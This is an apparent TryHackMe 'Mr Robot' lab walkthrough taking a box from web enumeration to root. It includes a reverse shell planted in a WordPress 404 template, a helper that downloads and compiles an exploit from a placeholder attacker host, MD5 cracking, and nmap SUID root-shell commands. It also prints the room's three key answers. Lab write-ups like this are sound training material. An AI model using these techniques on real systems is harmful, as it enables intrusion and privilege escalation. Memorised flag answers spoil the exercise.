TryHackMe – Mr Robot
What is key 1?
Start with a basic nmap scan:
Looking at the web page, there wasn’t anything immediately interesting.
Let's use gobuster to find anything accessible that isn't linked from the surface of the web app:
robots.txt stands out; let's take a look:
Looks like one of the keys was only "hidden" by robots.txt and is directly readable over the web:
073403c8a58a1f80d943455fb30724b9
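The robots.txt step above, as an added example that is not part of the original writeup: pull every path a robots.txt asks crawlers to avoid and check which of them the server actually serves. The robots.txt content below is constructed for the example (placeholder names, not the room's real file); the target URL is the one used later on this page.

```shell
#!/bin/sh
# Added example, not from the original writeup: turn a robots.txt into a list
# of "hidden" paths and check which of them the server actually serves.
# The robots.txt content below is constructed for the example.

# parse_robots: read robots.txt on stdin and print one path per line for each
# Disallow: entry. Comments, CRLF line endings, the bare "/" and wildcard
# patterns (which are not fetchable paths) are dropped.
parse_robots() {
    tr -d '\r' \
    | sed -n 's/^[[:space:]]*[Dd]isallow:[[:space:]]*\(\/[^#[:space:]]*\).*$/\1/p' \
    | grep -v '\*' \
    | grep -v '^/$' \
    | sort -u
}

# probe_paths: GET every path read from stdin on the base URL given as $1 and
# print "<http-status> <path>", so the 200s stand out from the 403s and 404s.
probe_paths() {
    base="$1"
    while IFS= read -r path; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "$base$path")
        printf '%s %s\n' "$code" "$path"
    done
}

# Constructed sample robots.txt (placeholder names, not the room's real file).
SAMPLE_ROBOTS='User-agent: *
Disallow: /
Disallow: /hidden-wordlist.dic   # a wordlist left on the web root
Disallow: /secret-key.txt
Disallow: /wp-admin/*
Allow: /wp-admin/admin-ajax.php'

# Against the live target the whole pipeline is:
#   curl -s http://10.10.153.190/robots.txt | parse_robots | probe_paths http://10.10.153.190
# Offline, only the parser is exercised:
printf '%s\n' "$SAMPLE_ROBOTS" | parse_robots
```

Disallow lines are the interesting ones: they are the paths the site owner did not want indexed, and robots.txt is served to everyone, so each entry is a free hint. Wildcard patterns are skipped because they are not fetchable as written.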
What is key 2?
Poking around on more of the pages found by gobuster, we find one that stands out. Inspecting the source reveals some hidden text. It looks like it may be a password for the admin login pages we found elsewhere.
Tried using it as a password with a handful of guessed usernames before realizing it is probably an encoded value... yup, it decodes:
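The "is this encoded?" check above, as an added example that is not part of the original writeup: before spraying a string from page source as a password, test whether it is syntactically base64 and decodes to printable text. The sample value is constructed (a placeholder credential, not the room's).

```shell
#!/bin/sh
# Added example, not from the original writeup: decide whether a string found
# in page source is base64 before trying it as a password, and decode it if so.
# HIDDEN below is a constructed placeholder credential, not the room's value.

# looks_like_base64: strict syntactic check. Base64 uses only A-Z a-z 0-9 + /,
# at most two trailing "=" pads, and its length is a multiple of 4.
looks_like_base64() {
    s=$(printf '%s' "$1" | tr -d '[:space:]')
    printf '%s' "$s" | grep -Eq '^[A-Za-z0-9+/]+={0,2}$' || return 1
    [ $(( ${#s} % 4 )) -eq 0 ]
}

# decode_hidden: print the decoded value when the input is base64 AND decodes
# to printable text; otherwise print the input unchanged, because a string
# like "password" passes the syntax check yet decodes to garbage bytes and may
# really be the password itself.
decode_hidden() {
    if looks_like_base64 "$1"; then
        plain=$(printf '%s' "$1" | tr -d '[:space:]' | base64 -d 2>/dev/null) \
            || { printf '%s\n' "$1"; return 0; }
        if printf '%s' "$plain" | LC_ALL=C grep -q '[^[:print:]]'; then
            printf '%s\n' "$1"
        else
            printf '%s\n' "$plain"
        fi
    else
        printf '%s\n' "$1"
    fi
    return 0
}

# Constructed sample: what a base64 "user:password" hint would look like.
HIDDEN=$(printf '%s' 'elliot:Constructed-Pass-1' | base64)

decode_hidden "$HIDDEN"
```

The length and padding checks matter more than they look: plain words made of base64 characters slip past an alphabet-only regex, and the printable-text check is what separates a real decode from noise.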
We’re in as Elliot:
Poking around as Elliot and looking at the users, we see another user, and her bio looks like it references another key. Luckily, since we are the admin, we can set a new password for her and log in as her to take a look:
We’re in as Krista:
Unfortunately, nothing of interest there.
Back to Elliot’s account…
Looks like there is a section where Elliot can upload media:
Try uploading revshell.jpg.php:
First, start a netcat listener:
Upload successful:
The file won't execute, though: the upload has decent filtering in place and rewrites the name, adding an underscore before .jpg, so it is only ever treated as a jpg.
After some trying, there is no easy way past the filter. Instead, maybe we can introduce our own weaker upload path. There is also a spot to manage plugins:
Clicking “add new” shows us we can browse their library of extensions, download one we want, and then upload the extension as a .zip to get that functionality.
Browsing their library, this one looks like it may not restrict uploads to certain file types:
Upload it to the site:
The plugin installed, but I don't know enough about WordPress to find where to enable it, and the examples I found for this extension are for a "contact" section that isn't available in Elliot's portal.
*Had to pause at this point and am picking back up on a different day. After checking a walkthrough for a hint in the right direction, it looks like we can instead put the script into a theme's 404 template, so we will start there.*
Go to Appearance > Editor:
Select the 404 template in the top right…
Copy and paste the contents of our revshell.php into the template:
Now, whenever the theme serves a 404 it should run this script. (The theme editor lets any WordPress administrator write arbitrary PHP into theme files unless DISALLOW_FILE_EDIT is set in wp-config.php, which is why admin access here amounts to code execution on the host.)
Lets start up a netcat listener again:
Now we can visit any path that doesn't exist (e.g. http://10.10.153.190/anything) and the listener will get a connection:
First, let’s stabilize our shell:
Now for some initial enumeration. After poking around, we find key-2-of-3.txt in /home/robot:
We can't read it since we're running as daemon, but next to it is password.raw-md5, which is likely the unsalted MD5 of robot's password:
Let's grab that:
We could feed this to John the Ripper, but a faster path is to look it up in an online MD5 database (on a real engagement, prefer cracking offline: submitting the hash to a third-party site discloses it):
And we're in as robot and can read key 2!
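The offline alternative to the online lookup, as an added example that is not part of the original writeup: hash each wordlist candidate with md5sum and compare against the raw (unsalted) MD5, and verify a password recovered elsewhere the same way. The hash and the wordlist below are constructed for the example; the usage comment assumes the file holds a bare hash (if it is stored as user:hash, cut the hash field out first).

```shell
#!/bin/sh
# Added example, not from the original writeup: crack or verify an unsalted
# ("raw") MD5 offline instead of trusting an online lookup. The hash and the
# wordlist below are constructed for the example; neither is the room's.

# md5_of: MD5 hex digest of the string in $1 with NO trailing newline.
# (echo "$w" | md5sum hashes "w\n", which is the classic reason a correct
# password fails to match a raw-md5 file.)
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# check_password: exit 0 when candidate $1 hashes to the target hash $2
# (case-insensitive on the hex digest).
check_password() {
    [ "$(md5_of "$1")" = "$(printf '%s' "$2" | tr 'A-F' 'a-f')" ]
}

# md5_crack: read candidates from the wordlist file $2, print the first one
# that hashes to $1 and exit 0; exit 1 when the list is exhausted.
md5_crack() {
    target=$1
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if check_password "$candidate" "$target"; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed demo data: a short wordlist and the hash of one of its entries.
WORDLIST=$(mktemp)
printf '%s\n' 'letmein' 'password1' 'Constructed-P4ss' 'qwerty' > "$WORDLIST"
TARGET_HASH=$(md5_of 'Constructed-P4ss')

# On the box (assuming the file holds a bare hash):
#   md5_crack "$(cat /home/robot/password.raw-md5)" /path/to/wordlist.txt
md5_crack "$TARGET_HASH" "$WORDLIST"
```

A shell loop is slow next to John or hashcat, but it is enough for a small wordlist and has no dependencies beyond coreutils, which is what you usually have on the victim.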
822c73956184f694993bede3eb39f959
What is key 3?
Using Metasploit earlier on might have made this privesc a lot easier, but we're going to do this by hand.
Looks like the box is running Ubuntu 14.04:
Searching exploit-db, we find what appears to be a suitable exploit:
Let's paste it into Sublime, save it as a .c file, serve it from a local web server, and fetch it from the victim machine:
Hmm, robot doesn't have permission to write the file in this directory:
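The write-permission problem above, as an added example that is not part of the original writeup: pick a directory the current unprivileged user can actually write to before pulling the source over, warn if that directory is mounted noexec, and build there. The attacker URL is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original writeup: stage a downloaded exploit
# source in a directory the current user can write to, then compile it there.
# ATTACKER_IP in the usage comment is a placeholder.

# pick_stage_dir: print the first scratch directory that exists and is both
# writable and traversable by us. $HOME and $PWD are last resorts.
pick_stage_dir() {
    for d in /dev/shm /tmp /var/tmp "$HOME" "$PWD"; do
        if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ] && [ -x "$d" ]; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# is_noexec: exit 0 when $1 is itself a mount point mounted with noexec
# (Linux only; reads /proc/mounts). A noexec /tmp silently breaks "./exploit".
is_noexec() {
    awk -v d="$1" '$2 == d && $4 ~ /(^|,)noexec(,|$)/ { found = 1 }
                    END { exit !found }' /proc/mounts 2>/dev/null
}

# stage_and_build: download the .c file at URL $1 into a writable directory,
# compile it with gcc and print the path of the resulting binary.
stage_and_build() {
    url=$1
    case "$url" in *.c) ;; *) echo "expected a .c URL, got: $url" >&2; return 1 ;; esac
    dir=$(pick_stage_dir) || { echo 'no writable directory found' >&2; return 1; }
    if is_noexec "$dir"; then
        echo "warning: $dir is mounted noexec; the binary will not run from there" >&2
    fi
    src="$dir/$(basename "$url")"
    if command -v wget >/dev/null 2>&1; then
        wget -q -O "$src" "$url" || return 1
    else
        curl -fsS -o "$src" "$url" || return 1
    fi
    gcc -o "${src%.c}" "$src" && printf '%s\n' "${src%.c}"
}

# Usage on the box, with the attacker serving the file (e.g. python3 -m http.server):
#   bin=$(stage_and_build http://ATTACKER_IP:8000/exploit.c) && "$bin"
pick_stage_dir
```

If gcc is missing on the target, compile on the attacker side against a matching glibc and copy the binary over instead; the staging-directory logic is the same.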
Looking at the SUID binaries we have:
su seems interesting; GTFOBins has an entry for it:
That did not work out, though (su is setuid root on every Linux system by design, so it isn't a misconfiguration, and it still needs the target account's password):
Okay, let's pivot to mount, which looks promising on GTFOBins:
Looks like the first pass used an incomplete command and missed binaries; a second, more thorough SUID enumeration reveals:
nmap really stands out on that list, and sure enough GTFOBins has several options for it:
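The enumeration that the first pass got wrong, as an added example that is not part of the original writeup: a full setuid sweep with the permission noise suppressed, plus a check of the hits against a short list of binaries GTFOBins documents with a SUID shell escape. The list is a hand-picked subset of GTFOBins' SUID entries, not a complete copy, and nothing in the block escalates by itself; the nmap commands in the comments are the ones GTFOBins gives.

```shell
#!/bin/sh
# Added example, not from the original writeup: a thorough SUID sweep and a
# first-things-to-try filter against a subset of GTFOBins' SUID entries.

# find_suid: list setuid regular files under $1 (default /).
# -perm -4000 matches the setuid bit whatever the other mode bits are;
# 2>/dev/null hides the permission-denied noise that buries the real hits.
# On a real box add "-user root": setuid files owned by ordinary users give nothing.
find_suid() {
    find "${1:-/}" -type f -perm -4000 2>/dev/null | sort
}

# GTFOBINS_SUID: binaries GTFOBins lists with a SUID shell escape (subset).
GTFOBINS_SUID='nmap find vim bash dash python perl php env awk less more nano cp mv tee'

# flag_gtfobins: read full paths from stdin and print the basenames that
# appear in GTFOBINS_SUID. Those are the binaries worth trying first.
flag_gtfobins() {
    while IFS= read -r path; do
        name=$(basename "$path")
        for b in $GTFOBINS_SUID; do
            [ "$name" = "$b" ] && printf '%s\n' "$name"
        done
    done
    return 0
}

# Against the box:   find_suid | flag_gtfobins
#
# GTFOBins' SUID entries for nmap. --interactive exists only in old releases;
# the --script route works on newer ones:
#   nmap --interactive          then at the nmap> prompt:   !sh
#   TF=$(mktemp); echo 'os.execute("/bin/sh")' > "$TF"; nmap --script="$TF"
# The spawned /bin/sh keeps the effective uid 0. Use sh, or bash -p: plain bash
# drops the effective uid back to the real uid on startup.
if [ -n "${1:-}" ]; then
    find_suid "$1" | flag_gtfobins
fi
```

Run stand-alone with a directory argument it sweeps that tree; without one it only defines the functions, since a full sweep of / takes a while.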
Let’s try that out:
It works! And we get key 3:
04787ddef27c3dee1ee161b21670b4e4